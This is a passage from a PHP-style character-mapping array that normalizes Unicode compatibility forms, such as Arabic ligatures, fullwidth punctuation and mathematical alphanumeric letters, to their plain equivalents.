'ﮝ' => 'ڱ', 'ﮞ' => 'ں', 'ﮟ' => 'ں', 'ﮠ' => 'ڻ', 'ﮡ' => 'ڻ', 'ﮢ' => 'ڻ', 'ﮣ' => 'ڻ', 'ﮤ' => 'ۀ', 'ﮥ' => 'ۀ', 'ﮦ' => 'ہ', 'ﮧ' => 'ہ', 'ﮨ' => 'ہ', 'ﮩ' => 'ہ', 'ﮪ' => 'ھ', 'ﮫ' => 'ھ', 'ﮬ' => 'ھ', 'ﮭ' => 'ھ', 'ﮮ' => 'ے', 'ﮯ' => 'ے', 'ﮰ' => 'ۓ', 'ﮱ' => 'ۓ', 'ﯓ' => 'ڭ', 'ﯔ' => 'ڭ', 'ﯕ' => 'ڭ', 'ﯖ' => 'ڭ', 'ﯗ' => 'ۇ', 'ﯘ' => 'ۇ', 'ﯙ' => 'ۆ', 'ﯚ' => 'ۆ', 'ﯛ' => 'ۈ', 'ﯜ' => 'ۈ', 'ﯝ' => 'ۇٴ', 'ﯞ' => 'ۋ', 'ﯟ' => 'ۋ', 'ﯠ' => 'ۅ', 'ﯡ' => 'ۅ', 'ﯢ' => 'ۉ', 'ﯣ' => 'ۉ', 'ﯤ' => 'ې', 'ﯥ' => 'ې', 'ﯦ' => 'ې', 'ﯧ' => 'ې', 'ﯨ' => 'ى', 'ﯩ' => 'ى', 'ﯪ' => 'ئا', 'ﯫ' => 'ئا', 'ﯬ' => 'ئە', 'ﯭ' => 'ئە', 'ﯮ' => 'ئو', 'ﯯ' => 'ئو', 'ﯰ' => 'ئۇ', 'ﯱ' => 'ئۇ', 'ﯲ' => 'ئۆ', 'ﯳ' => 'ئۆ', 'ﯴ' => 'ئۈ', 'ﯵ' => 'ئۈ', 'ﯶ' => 'ئې', 'ﯷ' => 'ئې', 'ﯸ' => 'ئې', 'ﯹ' => 'ئى', 'ﯺ' => 'ئى', 'ﯻ' => 'ئى', 'ﯼ' => 'ی', 'ﯽ' => 'ی', 'ﯾ' => 'ی', 'ﯿ' => 'ی', 'ﰀ' => 'ئج', 'ﰁ' => 'ئح', 'ﰂ' => 'ئم', 'ﰃ' => 'ئى', 'ﰄ' => 'ئي', 'ﰅ' => 'بج', 'ﰆ' => 'بح', 'ﰇ' => 'بخ', 'ﰈ' => 'بم', 'ﰉ' => 'بى', 'ﰊ' => 'بي', 'ﰋ' => 'تج', 'ﰌ' => 'تح', 'ﰍ' => 'تخ', 'ﰎ' => 'تم', 'ﰏ' => 'تى', 'ﰐ' => 'تي', 'ﰑ' => 'ثج', 'ﰒ' => 'ثم', 'ﰓ' => 'ثى', 'ﰔ' => 'ثي', 'ﰕ' => 'جح', 'ﰖ' => 'جم', 'ﰗ' => 'حج', 'ﰘ' => 'حم', 'ﰙ' => 'خج', 'ﰚ' => 'خح', 'ﰛ' => 'خم', 'ﰜ' => 'سج', 'ﰝ' => 'سح', 'ﰞ' => 'سخ', 'ﰟ' => 'سم', 'ﰠ' => 'صح', 'ﰡ' => 'صم', 'ﰢ' => 'ضج', 'ﰣ' => 'ضح', 'ﰤ' => 'ضخ', 'ﰥ' => 'ضم', 'ﰦ' => 'طح', 'ﰧ' => 'طم', 'ﰨ' => 'ظم', 'ﰩ' => 'عج', 'ﰪ' => 'عم', 'ﰫ' => 'غج', 'ﰬ' => 'غم', 'ﰭ' => 'فج', 'ﰮ' => 'فح', 'ﰯ' => 'فخ', 'ﰰ' => 'فم', 'ﰱ' => 'فى', 'ﰲ' => 'في', 'ﰳ' => 'قح', 'ﰴ' => 'قم', 'ﰵ' => 'قى', 'ﰶ' => 'قي', 'ﰷ' => 'كا', 'ﰸ' => 'كج', 'ﰹ' => 'كح', 'ﰺ' => 'كخ', 'ﰻ' => 'كل', 'ﰼ' => 'كم', 'ﰽ' => 'كى', 'ﰾ' => 'كي', 'ﰿ' => 'لج', 'ﱀ' => 'لح', 'ﱁ' => 'لخ', 'ﱂ' => 'لم', 'ﱃ' => 'لى', 'ﱄ' => 'لي', 'ﱅ' => 'مج', 'ﱆ' => 'مح', 'ﱇ' => 'مخ', 'ﱈ' => 'مم', 'ﱉ' => 'مى', 'ﱊ' => 'مي', 'ﱋ' => 'نج', 'ﱌ' => 'نح', 'ﱍ' => 'نخ', 'ﱎ' => 'نم', 'ﱏ' => 'نى', 'ﱐ' => 'ني', 'ﱑ' => 'هج', 'ﱒ' => 'هم', 'ﱓ' => 'هى', 'ﱔ' => 'هي', 'ﱕ' => 'يج', 'ﱖ' => 'يح', 'ﱗ' => 'يخ', 'ﱘ' => 'يم', 'ﱙ' => 'يى', 'ﱚ' => 'يي', 'ﱛ' => 'ذٰ', 'ﱜ' => 'رٰ', 'ﱝ' => 'ىٰ', 'ﱞ' => ' ٌّ', 'ﱟ' => ' ٍّ', 'ﱠ' => ' َّ', 'ﱡ' => ' ُّ', 'ﱢ' => ' ِّ', 'ﱣ' => ' ّٰ', 'ﱤ' => 'ئر', 'ﱥ' => 'ئز', 'ﱦ' => 'ئم', 'ﱧ' => 'ئن', 'ﱨ' => 'ئى', 'ﱩ' => 'ئي', 'ﱪ' => 'بر', 'ﱫ' => 'بز', 'ﱬ' => 'بم', 'ﱭ' => 'بن', 'ﱮ' => 'بى', 'ﱯ' => 'بي', 'ﱰ' => 'تر', 'ﱱ' => 'تز', 'ﱲ' => 'تم', 'ﱳ' => 'تن', 'ﱴ' => 'تى', 'ﱵ' => 'تي', 'ﱶ' => 'ثر', 'ﱷ' => 'ثز', 'ﱸ' => 'ثم', 'ﱹ' => 'ثن', 'ﱺ' => 'ثى', 'ﱻ' => 'ثي', 'ﱼ' => 'فى', 'ﱽ' => 'في', 'ﱾ' => 'قى', 'ﱿ' => 'قي', 'ﲀ' => 'كا', 'ﲁ' => 'كل', 'ﲂ' => 'كم', 'ﲃ' => 'كى', 'ﲄ' => 'كي', 'ﲅ' => 'لم', 'ﲆ' => 'لى', 'ﲇ' => 'لي', 'ﲈ' => 'ما', 'ﲉ' => 'مم', 'ﲊ' => 'نر', 'ﲋ' => 'نز', 'ﲌ' => 'نم', 'ﲍ' => 'نن', 'ﲎ' => 'نى', 'ﲏ' => 'ني', 'ﲐ' => 'ىٰ', 'ﲑ' => 'ير', 'ﲒ' => 'يز', 'ﲓ' => 'يم', 'ﲔ' => 'ين', 'ﲕ' => 'يى', 'ﲖ' => 'يي', 'ﲗ' => 'ئج', 'ﲘ' => 'ئح', 'ﲙ' => 'ئخ', 'ﲚ' => 'ئم', 'ﲛ' => 'ئه', 'ﲜ' => 'بج', 'ﲝ' => 'بح', 'ﲞ' => 'بخ', 'ﲟ' => 'بم', 'ﲠ' => 'به', 'ﲡ' => 'تج', 'ﲢ' => 'تح', 'ﲣ' => 'تخ', 'ﲤ' => 'تم', 'ﲥ' => 'ته', 'ﲦ' => 'ثم', 'ﲧ' => 'جح', 'ﲨ' => 'جم', 'ﲩ' => 'حج', 'ﲪ' => 'حم', 'ﲫ' => 'خج', 'ﲬ' => 'خم', 'ﲭ' => 'سج', 'ﲮ' => 'سح', 'ﲯ' => 'سخ', 'ﲰ' => 'سم', 'ﲱ' => 'صح', 'ﲲ' => 'صخ', 'ﲳ' => 'صم', 'ﲴ' => 'ضج', 'ﲵ' => 'ضح', 'ﲶ' => 'ضخ', 'ﲷ' => 'ضم', 'ﲸ' => 'طح', 'ﲹ' => 'ظم', 'ﲺ' => 'عج', 'ﲻ' => 'عم', 'ﲼ' => 'غج', 'ﲽ' => 'غم', 'ﲾ' => 'فج', 'ﲿ' => 'فح', 'ﳀ' => 'فخ', 'ﳁ' => 'فم', 'ﳂ' => 'قح', 'ﳃ' => 'قم', 'ﳄ' => 'كج', 'ﳅ' => 'كح', 'ﳆ' => 'كخ', 'ﳇ' => 'كل', 'ﳈ' => 'كم', 'ﳉ' => 'لج', 'ﳊ' => 'لح', 'ﳋ' => 'لخ', 'ﳌ' => 'لم', 'ﳍ' => 'له', 'ﳎ' => 'مج', 'ﳏ' => 'مح', 'ﳐ' => 'مخ', 'ﳑ' => 'مم', 'ﳒ' => 'نج', 'ﳓ' => 'نح', 'ﳔ' => 'نخ', 'ﳕ' => 'نم', 'ﳖ' => 'نه', 'ﳗ' => 'هج', 'ﳘ' => 'هم', 'ﳙ' => 'هٰ', 'ﳚ' => 'يج', 'ﳛ' => 'يح', 'ﳜ' => 'يخ', 'ﳝ' => 'يم', 'ﳞ' => 'يه', 'ﳟ' => 'ئم', 'ﳠ' => 'ئه', 'ﳡ' => 'بم', 'ﳢ' => 'به', 'ﳣ' => 'تم', 'ﳤ' => 'ته', 'ﳥ' => 'ثم', 'ﳦ' => 'ثه', 'ﳧ' => 'سم', 'ﳨ' => 'سه', 'ﳩ' => 'شم', 'ﳪ' => 'شه', 'ﳫ' => 'كل', 'ﳬ' => 'كم', 'ﳭ' => 'لم', 'ﳮ' => 'نم', 'ﳯ' => 'نه', 'ﳰ' => 'يم', 'ﳱ' => 'يه', 'ﳲ' => 'ـَّ', 'ﳳ' => 'ـُّ', 'ﳴ' => 'ـِّ', 'ﳵ' => 'طى', 'ﳶ' => 'طي', 'ﳷ' => 'عى', 'ﳸ' => 'عي', 'ﳹ' => 'غى', 'ﳺ' => 'غي', 'ﳻ' => 'سى', 'ﳼ' => 'سي', 'ﳽ' => 'شى', 'ﳾ' => 'شي', 'ﳿ' => 'حى', 'ﴀ' => 'حي', 'ﴁ' => 'جى', 'ﴂ' => 'جي', 'ﴃ' => 'خى', 'ﴄ' => 'خي', 'ﴅ' => 'صى', 'ﴆ' => 'صي', 'ﴇ' => 'ضى', 'ﴈ' => 'ضي', 'ﴉ' => 'شج', 'ﴊ' => 'شح', 'ﴋ' => 'شخ', 'ﴌ' => 'شم', 'ﴍ' => 'شر', 'ﴎ' => 'سر', 'ﴏ' => 'صر', 'ﴐ' => 'ضر', 'ﴑ' => 'طى', 'ﴒ' => 'طي', 'ﴓ' => 'عى', 'ﴔ' => 'عي', 'ﴕ' => 'غى', 'ﴖ' => 'غي', 'ﴗ' => 'سى', 'ﴘ' => 'سي', 'ﴙ' => 'شى', 'ﴚ' => 'شي', 'ﴛ' => 'حى', 'ﴜ' => 'حي', 'ﴝ' => 'جى', 'ﴞ' => 'جي', 'ﴟ' => 'خى', 'ﴠ' => 'خي', 'ﴡ' => 'صى', 'ﴢ' => 'صي', 'ﴣ' => 'ضى', 'ﴤ' => 'ضي', 'ﴥ' => 'شج', 'ﴦ' => 'شح', 'ﴧ' => 'شخ', 'ﴨ' => 'شم', 'ﴩ' => 'شر', 'ﴪ' => 'سر', 'ﴫ' => 'صر', 'ﴬ' => 'ضر', 'ﴭ' => 'شج', 'ﴮ' => 'شح', 'ﴯ' => 'شخ', 'ﴰ' => 'شم', 'ﴱ' => 'سه', 'ﴲ' => 'شه', 'ﴳ' => 'طم', 'ﴴ' => 'سج', 'ﴵ' => 'سح', 'ﴶ' => 'سخ', 'ﴷ' => 'شج', 'ﴸ' => 'شح', 'ﴹ' => 'شخ', 'ﴺ' => 'طم', 'ﴻ' => 'ظم', 'ﴼ' => 'اً', 'ﴽ' => 'اً', 'ﵐ' => 'تجم', 'ﵑ' => 'تحج', 'ﵒ' => 'تحج', 'ﵓ' => 'تحم', 'ﵔ' => 'تخم', 'ﵕ' => 'تمج', 'ﵖ' => 'تمح', 'ﵗ' => 'تمخ', 'ﵘ' => 'جمح', 'ﵙ' => 'جمح', 'ﵚ' => 'حمي', 'ﵛ' => 'حمى', 'ﵜ' => 'سحج', 'ﵝ' => 'سجح', 'ﵞ' => 'سجى', 'ﵟ' => 'سمح', 'ﵠ' => 'سمح', 'ﵡ' => 'سمج', 'ﵢ' => 'سمم', 'ﵣ' => 'سمم', 'ﵤ' => 'صحح', 'ﵥ' => 'صحح', 'ﵦ' => 'صمم', 'ﵧ' => 'شحم', 'ﵨ' => 'شحم', 'ﵩ' => 'شجي', 'ﵪ' => 'شمخ', 'ﵫ' => 'شمخ', 'ﵬ' => 'شمم', 'ﵭ' => 'شمم', 'ﵮ' => 'ضحى', 'ﵯ' => 'ضخم', 'ﵰ' => 'ضخم', 'ﵱ' => 'طمح', 'ﵲ' => 'طمح', 'ﵳ' => 'طمم', 'ﵴ' => 'طمي', 'ﵵ' => 'عجم', 'ﵶ' => 'عمم', 'ﵷ' => 'عمم', 'ﵸ' => 'عمى', 'ﵹ' => 'غمم', 'ﵺ' => 'غمي', 'ﵻ' => 'غمى', 'ﵼ' => 'فخم', 'ﵽ' => 'فخم', 'ﵾ' => 'قمح', 'ﵿ' => 'قمم', 'ﶀ' => 'لحم', 'ﶁ' => 'لحي', 'ﶂ' => 'لحى', 'ﶃ' => 'لجج', 'ﶄ' => 'لجج', 'ﶅ' => 'لخم', 'ﶆ' => 'لخم', 'ﶇ' => 'لمح', 'ﶈ' => 'لمح', 'ﶉ' => 'محج', 'ﶊ' => 'محم', 'ﶋ' => 'محي', 'ﶌ' => 'مجح', 'ﶍ' => 'مجم', 'ﶎ' => 'مخج', 'ﶏ' => 'مخم', 'ﶒ' => 'مجخ', 'ﶓ' => 'همج', 'ﶔ' => 'همم', 'ﶕ' => 'نحم', 'ﶖ' => 'نحى', 'ﶗ' => 'نجم', 'ﶘ' => 'نجم', 'ﶙ' => 'نجى', 'ﶚ' => 'نمي', 'ﶛ' => 'نمى', 'ﶜ' => 'يمم', 'ﶝ' => 'يمم', 'ﶞ' => 'بخي', 'ﶟ' => 'تجي', 'ﶠ' => 'تجى', 'ﶡ' => 'تخي', 'ﶢ' => 'تخى', 'ﶣ' => 'تمي', 'ﶤ' => 'تمى', 'ﶥ' => 'جمي', 'ﶦ' => 'جحى', 'ﶧ' => 'جمى', 'ﶨ' => 'سخى', 'ﶩ' => 'صحي', 'ﶪ' => 'شحي', 'ﶫ' => 'ضحي', 'ﶬ' => 'لجي', 'ﶭ' => 'لمي', 'ﶮ' => 'يحي', 'ﶯ' => 'يجي', 'ﶰ' => 'يمي', 'ﶱ' => 'ممي', 'ﶲ' => 'قمي', 'ﶳ' => 'نحي', 'ﶴ' => 'قمح', 'ﶵ' => 'لحم', 'ﶶ' => 'عمي', 'ﶷ' => 'كمي', 'ﶸ' => 'نجح', 'ﶹ' => 'مخي', 'ﶺ' => 'لجم', 'ﶻ' => 'كمم', 'ﶼ' => 'لجم', 'ﶽ' => 'نجح', 'ﶾ' => 'جحي', 'ﶿ' => 'حجي', 'ﷀ' => 'مجي', 'ﷁ' => 'فمي', 'ﷂ' => 'بحي', 'ﷃ' => 'كمم', 'ﷄ' => 'عجم', 'ﷅ' => 'صمم', 'ﷆ' => 'سخي', 'ﷇ' => 'نجي', 'ﷰ' => 'صلے', 'ﷱ' => 'قلے', 'ﷲ' => 'الله', 'ﷳ' => 'اكبر', 'ﷴ' => 'محمد', 'ﷵ' => 'صلعم', 'ﷶ' => 'رسول', 'ﷷ' => 'عليه', 'ﷸ' => 'وسلم', 'ﷹ' => 'صلى', 'ﷺ' => 'صلى الله عليه وسلم', 'ﷻ' => 'جل جلاله', '﷼' => 'ریال', '︐' => ',', '︑' => '、', '︒' => '。', '︓' => ':', '︔' => ';', '︕' => '!', '︖' => '?', '︗' => '〖', '︘' => '〗', '︙' => '...', '︰' => '..', '︱' => '—', '︲' => '–', '︳' => '_', '︴' => '_', '︵' => '(', '︶' => ')', '︷' => '{', '︸' => '}', '︹' => '〔', '︺' => '〕', '︻' => '【', '︼' => '】', '︽' => '《', '︾' => '》', '︿' => '〈', '﹀' => '〉', '﹁' => '「', '﹂' => '」', '﹃' => '『', '﹄' => '』', '﹇' => '[', '﹈' => ']', '﹉' => ' ̅', '﹊' => ' ̅', '﹋' => ' ̅', '﹌' => ' ̅', '﹍' => '_', '﹎' => '_', '﹏' => '_', '﹐' => ',', '﹑' => '、', '﹒' => '.', '﹔' => ';', '﹕' => ':', '﹖' => '?', '﹗' => '!', '﹘' => '—', '﹙' => '(', '﹚' => ')', '﹛' => '{', '﹜' => '}', '﹝' => '〔', '﹞' => '〕', '﹟' => '#', '﹠' => '&', '﹡' => '*', '﹢' => '+', '﹣' => '-', '﹤' => '<', '﹥' => '>', '﹦' => '=', '﹨' => '\\', '﹩' => '$', '﹪' => '%', '﹫' => '@', 'ﹰ' => ' ً', 'ﹱ' => 'ـً', 'ﹲ' => ' ٌ', 'ﹴ' => ' ٍ', 'ﹶ' => ' َ', 'ﹷ' => 'ـَ', 'ﹸ' => ' ُ', 'ﹹ' => 'ـُ', 'ﹺ' => ' ِ', 'ﹻ' => 'ـِ', 'ﹼ' => ' ّ', 'ﹽ' => 'ـّ', 'ﹾ' => ' ْ', 'ﹿ' => 'ـْ', 'ﺀ' => 'ء', 'ﺁ' => 'آ', 'ﺂ' => 'آ', 'ﺃ' => 'أ', 'ﺄ' => 'أ', 'ﺅ' => 'ؤ', 'ﺆ' => 'ؤ', 'ﺇ' => 'إ', 'ﺈ' => 'إ', 'ﺉ' => 'ئ', 'ﺊ' => 'ئ', 'ﺋ' => 'ئ', 'ﺌ' => 'ئ', 'ﺍ' => 'ا', 'ﺎ' => 'ا', 'ﺏ' => 'ب', 'ﺐ' => 'ب', 'ﺑ' => 'ب', 'ﺒ' => 'ب', 'ﺓ' => 'ة', 'ﺔ' => 'ة', 'ﺕ' => 'ت', 'ﺖ' => 'ت', 'ﺗ' => 'ت', 'ﺘ' => 'ت', 'ﺙ' => 'ث', 'ﺚ' => 'ث', 'ﺛ' => 'ث', 'ﺜ' => 'ث', 'ﺝ' => 'ج', 'ﺞ' => 'ج', 'ﺟ' => 'ج', 'ﺠ' => 'ج', 'ﺡ' => 'ح', 'ﺢ' => 'ح', 'ﺣ' => 'ح', 'ﺤ' => 'ح', 'ﺥ' => 'خ', 'ﺦ' => 'خ', 'ﺧ' => 'خ', 'ﺨ' => 'خ', 'ﺩ' => 'د', 'ﺪ' => 'د', 'ﺫ' => 'ذ', 'ﺬ' => 'ذ', 'ﺭ' => 'ر', 'ﺮ' => 'ر', 'ﺯ' => 'ز', 'ﺰ' => 'ز', 'ﺱ' => 'س', 'ﺲ' => 'س', 'ﺳ' => 'س', 'ﺴ' => 'س', 'ﺵ' => 'ش', 'ﺶ' => 'ش', 'ﺷ' => 'ش', 'ﺸ' => 'ش', 'ﺹ' => 'ص', 'ﺺ' => 'ص', 'ﺻ' => 'ص', 'ﺼ' => 'ص', 'ﺽ' => 'ض', 'ﺾ' => 'ض', 'ﺿ' => 'ض', 'ﻀ' => 'ض', 'ﻁ' => 'ط', 'ﻂ' => 'ط', 'ﻃ' => 'ط', 'ﻄ' => 'ط', 'ﻅ' => 'ظ', 'ﻆ' => 'ظ', 'ﻇ' => 'ظ', 'ﻈ' => 'ظ', 'ﻉ' => 'ع', 'ﻊ' => 'ع', 'ﻋ' => 'ع', 'ﻌ' => 'ع', 'ﻍ' => 'غ', 'ﻎ' => 'غ', 'ﻏ' => 'غ', 'ﻐ' => 'غ', 'ﻑ' => 'ف', 'ﻒ' => 'ف', 'ﻓ' => 'ف', 'ﻔ' => 'ف', 'ﻕ' => 'ق', 'ﻖ' => 'ق', 'ﻗ' => 'ق', 'ﻘ' => 'ق', 'ﻙ' => 'ك', 'ﻚ' => 'ك', 'ﻛ' => 'ك', 'ﻜ' => 'ك', 'ﻝ' => 'ل', 'ﻞ' => 'ل', 'ﻟ' => 'ل', 'ﻠ' => 'ل', 'ﻡ' => 'م', 'ﻢ' => 'م', 'ﻣ' => 'م', 'ﻤ' => 'م', 'ﻥ' => 'ن', 'ﻦ' => 'ن', 'ﻧ' => 'ن', 'ﻨ' => 'ن', 'ﻩ' => 'ه', 'ﻪ' => 'ه', 'ﻫ' => 'ه', 'ﻬ' => 'ه', 'ﻭ' => 'و', 'ﻮ' => 'و', 'ﻯ' => 'ى', 'ﻰ' => 'ى', 'ﻱ' => 'ي', 'ﻲ' => 'ي', 'ﻳ' => 'ي', 'ﻴ' => 'ي', 'ﻵ' => 'لآ', 'ﻶ' => 'لآ', 'ﻷ' => 'لأ', 'ﻸ' => 'لأ', 'ﻹ' => 'لإ', 'ﻺ' => 'لإ', 'ﻻ' => 'لا', 'ﻼ' => 'لا', '!' => '!', '"' => '"', '#' => '#', '$' => '$', '%' => '%', '&' => '&', ''' => '\'', '(' => '(', ')' => ')', '*' => '*', '+' => '+', ',' => ',', '-' => '-', '.' => '.', '/' => '/', '0' => '0', '1' => '1', '2' => '2', '3' => '3', '4' => '4', '5' => '5', '6' => '6', '7' => '7', '8' => '8', '9' => '9', ':' => ':', ';' => ';', '<' => '<', '=' => '=', '>' => '>', '?' => '?', '@' => '@', 'A' => 'A', 'B' => 'B', 'C' => 'C', 'D' => 'D', 'E' => 'E', 'F' => 'F', 'G' => 'G', 'H' => 'H', 'I' => 'I', 'J' => 'J', 'K' => 'K', 'L' => 'L', 'M' => 'M', 'N' => 'N', 'O' => 'O', 'P' => 'P', 'Q' => 'Q', 'R' => 'R', 'S' => 'S', 'T' => 'T', 'U' => 'U', 'V' => 'V', 'W' => 'W', 'X' => 'X', 'Y' => 'Y', 'Z' => 'Z', '[' => '[', '\' => '\\', ']' => ']', '^' => '^', '_' => '_', '`' => '`', 'a' => 'a', 'b' => 'b', 'c' => 'c', 'd' => 'd', 'e' => 'e', 'f' => 'f', 'g' => 'g', 'h' => 'h', 'i' => 'i', 'j' => 'j', 'k' => 'k', 'l' => 'l', 'm' => 'm', 'n' => 'n', 'o' => 'o', 'p' => 'p', 'q' => 'q', 'r' => 'r', 's' => 's', 't' => 't', 'u' => 'u', 'v' => 'v', 'w' => 'w', 'x' => 'x', 'y' => 'y', 'z' => 'z', '{' => '{', '|' => '|', '}' => '}', '~' => '~', '⦅' => '⦅', '⦆' => '⦆', '。' => '。', '「' => '「', '」' => '」', '、' => '、', '・' => '・', 'ヲ' => 'ヲ', 'ァ' => 'ァ', 'ィ' => 'ィ', 'ゥ' => 'ゥ', 'ェ' => 'ェ', 'ォ' => 'ォ', 'ャ' => 'ャ', 'ュ' => 'ュ', 'ョ' => 'ョ', 'ッ' => 'ッ', 'ー' => 'ー', 'ア' => 'ア', 'イ' => 'イ', 'ウ' => 'ウ', 'エ' => 'エ', 'オ' => 'オ', 'カ' => 'カ', 'キ' => 'キ', 'ク' => 'ク', 'ケ' => 'ケ', 'コ' => 'コ', 'サ' => 'サ', 'シ' => 'シ', 'ス' => 'ス', 'セ' => 'セ', 'ソ' => 'ソ', 'タ' => 'タ', 'チ' => 'チ', 'ツ' => 'ツ', 'テ' => 'テ', 'ト' => 'ト', 'ナ' => 'ナ', 'ニ' => 'ニ', 'ヌ' => 'ヌ', 'ネ' => 'ネ', 'ノ' => 'ノ', 'ハ' => 'ハ', 'ヒ' => 'ヒ', 'フ' => 'フ', 'ヘ' => 'ヘ', 'ホ' => 'ホ', 'マ' => 'マ', 'ミ' => 'ミ', 'ム' => 'ム', 'メ' => 'メ', 'モ' => 'モ', 'ヤ' => 'ヤ', 'ユ' => 'ユ', 'ヨ' => 'ヨ', 'ラ' => 'ラ', 'リ' => 'リ', 'ル' => 'ル', 'レ' => 'レ', 'ロ' => 'ロ', 'ワ' => 'ワ', 'ン' => 'ン', '゙' => '゙', '゚' => '゚', 'ᅠ' => 'ᅠ', 'ᄀ' => 'ᄀ', 'ᄁ' => 'ᄁ', 'ᆪ' => 'ᆪ', 'ᄂ' => 'ᄂ', 'ᆬ' => 'ᆬ', 'ᆭ' => 'ᆭ', 'ᄃ' => 'ᄃ', 'ᄄ' => 'ᄄ', 'ᄅ' => 'ᄅ', 'ᆰ' => 'ᆰ', 'ᆱ' => 'ᆱ', 'ᆲ' => 'ᆲ', 'ᆳ' => 'ᆳ', 'ᆴ' => 'ᆴ', 'ᆵ' => 'ᆵ', 'ᄚ' => 'ᄚ', 'ᄆ' => 'ᄆ', 'ᄇ' => 'ᄇ', 'ᄈ' => 'ᄈ', 'ᄡ' => 'ᄡ', 'ᄉ' => 'ᄉ', 'ᄊ' => 'ᄊ', 'ᄋ' => 'ᄋ', 'ᄌ' => 'ᄌ', 'ᄍ' => 'ᄍ', 'ᄎ' => 'ᄎ', 'ᄏ' => 'ᄏ', 'ᄐ' => 'ᄐ', 'ᄑ' => 'ᄑ', 'ᄒ' => 'ᄒ', 'ᅡ' => 'ᅡ', 'ᅢ' => 'ᅢ', 'ᅣ' => 'ᅣ', 'ᅤ' => 'ᅤ', 'ᅥ' => 'ᅥ', 'ᅦ' => 'ᅦ', 'ᅧ' => 'ᅧ', 'ᅨ' => 'ᅨ', 'ᅩ' => 'ᅩ', 'ᅪ' => 'ᅪ', 'ᅫ' => 'ᅫ', 'ᅬ' => 'ᅬ', 'ᅭ' => 'ᅭ', 'ᅮ' => 'ᅮ', 'ᅯ' => 'ᅯ', 'ᅰ' => 'ᅰ', 'ᅱ' => 'ᅱ', 'ᅲ' => 'ᅲ', 'ᅳ' => 'ᅳ', 'ᅴ' => 'ᅴ', 'ᅵ' => 'ᅵ', '¢' => '¢', '£' => '£', '¬' => '¬', ' ̄' => ' ̄', '¦' => '¦', '¥' => '¥', '₩' => '₩', '│' => '│', '←' => '←', '↑' => '↑', '→' => '→', '↓' => '↓', '■' => '■', '○' => '○', '𝐀' => 'A', '𝐁' => 'B', '𝐂' => 'C', '𝐃' => 'D', '𝐄' => 'E', '𝐅' => 'F', '𝐆' => 'G', '𝐇' => 'H', '𝐈' => 'I', '𝐉' => 'J', '𝐊' => 'K', '𝐋' => 'L', '𝐌' => 'M', '𝐍' => 'N', '𝐎' => 'O', '𝐏' => 'P', '𝐐' => 'Q', '𝐑' => 'R', '𝐒' => 'S', '𝐓' => 'T', '𝐔' => 'U', '𝐕' => 'V', '𝐖' => 'W', '𝐗' => 'X', '𝐘' => 'Y', '𝐙' => 'Z', '𝐚' => 'a', '𝐛' => 'b', '𝐜' => 'c', '𝐝' => 'd', '𝐞' => 'e', '𝐟' => 'f', '𝐠' => 'g', '𝐡' => 'h', '𝐢' => 'i', '𝐣' => 'j', '𝐤' => 'k', '𝐥' => 'l', '𝐦' => 'm', '𝐧' => 'n', '𝐨' => 'o', '𝐩' => 'p', '𝐪' => 'q', '𝐫' => 'r', '𝐬' => 's', '𝐭' => 't', '𝐮' => 'u', '𝐯' => 'v', '𝐰' => 'w', '𝐱' => 'x', '𝐲' => 'y', '𝐳' => 'z', '𝐴' => 'A', '𝐵' => 'B', '𝐶' => 'C', '𝐷' => 'D', '𝐸' => 'E', '𝐹' => 'F', '𝐺' => 'G', '𝐻' => 'H', '𝐼' => 'I', '𝐽' => 'J', '𝐾' => 'K', '𝐿' => 'L', '𝑀' => 'M', '𝑁' => 'N', '𝑂' => 'O', '𝑃' => 'P', '𝑄' => 'Q', '𝑅' => 'R', '𝑆' => 'S', '𝑇' => 'T', '𝑈' => 'U', '𝑉' => 'V', '𝑊' => 'W', '𝑋' => 'X', '𝑌' => 'Y', '𝑍' => 'Z', '𝑎' => 'a', '𝑏' => 'b', '𝑐' => 'c', '𝑑' => 'd', '𝑒' => 'e', '𝑓' => 'f', '𝑔' => 'g', '𝑖' => 'i', '𝑗' => 'j', '𝑘' => 'k', '𝑙' => 'l', '𝑚' => 'm', '𝑛' => 'n', '𝑜' => 'o', '𝑝' => 'p', '𝑞' => 'q', '𝑟' => 'r', '𝑠' => 's', '𝑡' => 't', '𝑢' => 'u', '𝑣' => 'v', '𝑤' => 'w', '𝑥' => 'x', '𝑦' => 'y', '𝑧' => 'z', '𝑨' => 'A', '𝑩' => 'B', '𝑪' => 'C', '𝑫' => 'D', '𝑬' => 'E', '𝑭' => 'F', '𝑮' => 'G', '𝑯' => 'H', '𝑰' => 'I', '𝑱' => 'J', '𝑲' => 'K', '𝑳' => 'L', '𝑴' => 'M', '𝑵' => 'N', '𝑶' => 'O', '𝑷' => 'P', '𝑸' => 'Q', '𝑹' => 'R', '𝑺' => 'S', '𝑻' => 'T', '𝑼' => 'U', '𝑽' => 'V', '𝑾' => 'W', '𝑿' => 'X', '𝒀' => 'Y', '𝒁' => 'Z', '𝒂' => 'a', '𝒃' => 'b', '𝒄' => 'c', '𝒅' => 'd', '𝒆' => 'e', '𝒇' => 'f', '𝒈' => 'g', '𝒉' => 'h', '𝒊' => 'i', '𝒋' => 'j', '𝒌' => 'k', '𝒍' => 'l', '𝒎' => 'm', '𝒏' => 'n', '𝒐' => 'o', '𝒑' => 'p', '𝒒' => 'q', '𝒓' => 'r', '𝒔' => 's', '𝒕' => 't', '𝒖' => 'u', '𝒗' => 'v', '𝒘' => 'w', '𝒙' => 'x', '𝒚' => 'y', '𝒛' => 'z', '𝒜' => 'A', '𝒞' => 'C', '𝒟' => 'D', '𝒢' => 'G', '𝒥' => 'J', '𝒦' => 'K', '𝒩' => 'N', '𝒪' => 'O', '𝒫' => 'P', '𝒬' => 'Q', '𝒮' => 'S', '𝒯' => 'T', '𝒰' => 'U', '𝒱' => 'V', '𝒲' => 'W', '𝒳' => 'X', '𝒴' => 'Y', '𝒵' => 'Z', '𝒶' => 'a', '𝒷' => 'b', '𝒸' => 'c', '𝒹' => 'd', '𝒻' => 'f', '𝒽' => 'h', '𝒾' => 'i', '𝒿' => 'j', '𝓀' => 'k', '𝓁' => 'l', '𝓂' => 'm', '𝓃' => 'n', '𝓅' => 'p', '𝓆' => 'q', '𝓇' => 'r', '𝓈' => 's', '𝓉' => 't', '𝓊' => 'u', '𝓋' => 'v', '𝓌' => 'w', '𝓍' => 'x', '𝓎' => 'y', '𝓏' => 'z', '𝓐' => 'A', '𝓑' => 'B', '𝓒' => 'C', '𝓓' => 'D', '𝓔' => 'E', '𝓕' => 'F', '𝓖' => 'G', '𝓗' => 'H', '𝓘' => 'I', '𝓙' => 'J', '𝓚' => 'K', '𝓛' => 'L', '𝓜' => 'M', '𝓝' => 'N', '𝓞' => 'O', '𝓟' => 'P', '𝓠' => 'Q', 